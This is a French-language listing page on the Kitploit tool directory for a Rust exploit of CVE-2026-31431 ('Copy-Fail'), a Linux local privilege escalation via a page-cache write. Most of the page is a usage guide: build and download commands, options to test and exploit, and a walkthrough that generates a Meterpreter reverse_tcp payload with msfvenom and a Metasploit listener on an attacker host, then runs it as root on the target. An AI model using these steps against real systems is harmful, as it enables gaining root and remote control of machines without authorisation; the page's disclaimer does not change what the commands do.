Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-31431-Linux-Copy-Fail — Exploit d'élévation de privilèges locaux basé sur Rust pour CVE-2026-31431, permettant l'exécution de shellcode personnalisé tel que Meterpreter sur les systèmes Linux. | Kitploit
Outils/GitHubGitHub/iss4cf0ng/cve-2026-31431-linux-copy-fail
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationTests d'IntrusionDéveloppement de Charges UtilesExploitation de Binaires
GitHubiss4cf0ng/cve-2026-31431-linux-copy-fail

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-31431-Linux-Copy-Fail

Exploit d'élévation de privilèges locaux basé sur Rust pour CVE-2026-31431, permettant l'exécution de shellcode personnalisé tel que Meterpreter sur les systèmes Linux.

Voir le dépôtSite web
5621il y a 3 moisVérifié par Kitploit

CVE-2026-31431 - Exploit Copy-Fail Linux (Rust)

Une implémentation en Rust d'un exploit d'élévation de privilèges locaux pour CVE-2026-31431 (Copy-Fail).

Il permet d'exécuter un shellcode personnalisé (tel que Meterpreter)

Introduction

Xint a divulgué CVE-2026-31431, une vulnérabilité d'écriture arbitraire dans le cache de pages qui enchaîne AF_ALG et splice() pour obtenir une primitive d'écriture de 4 octets.

Source : Copy Fail : 732 octets pour obtenir root sur toutes les principales distributions Linux

Avertissement

Ce projet a été développé dans le cadre de mon intérêt personnel pour l'étude de la cybersécurité. Cependant, il pourrait potentiellement être utilisé à des fins malveillantes.

Veuillez ne PAS utiliser cet outil pour des activités illégales.

L'auteur n'est pas responsable de toute utilisation abusive de ce logiciel.

Remerciements

  • theori-io/copy-fail-CVE-2026-31431

Remarque : Le travail original utilise un shellcode compressé/encodé (par exemple, /bin/sh). Dans cette implémentation, je l'ai remplacé par un shellcode /bin/bash brut (non compressé), ce qui facilite la personnalisation ou le remplacement direct par des charges utiles fournies par l'utilisateur.

Comment compiler

Clonez le projet, puis exécutez build.sh :

root@kitploit:~
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

Utilisation

Téléchargez et extrayez le paquet de la version :

root@kitploit:~
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

Les binaires fournissent les options ci-dessous :

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

Démonstration

Tester la vulnérabilité

Sur la machine vulnérable :

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test

Exploitation

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Utilisez la commande ci-dessous (définissez PrependSetUid sur True) pour générer la charge utile Meterpreter :

root@kitploit:~
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

Sur la machine de l'attaquant (Kali Linux) :

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

Sur la machine vulnérable :

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

Versions concernées

  • Ubuntu
  • Redhat
Télécharger l’outil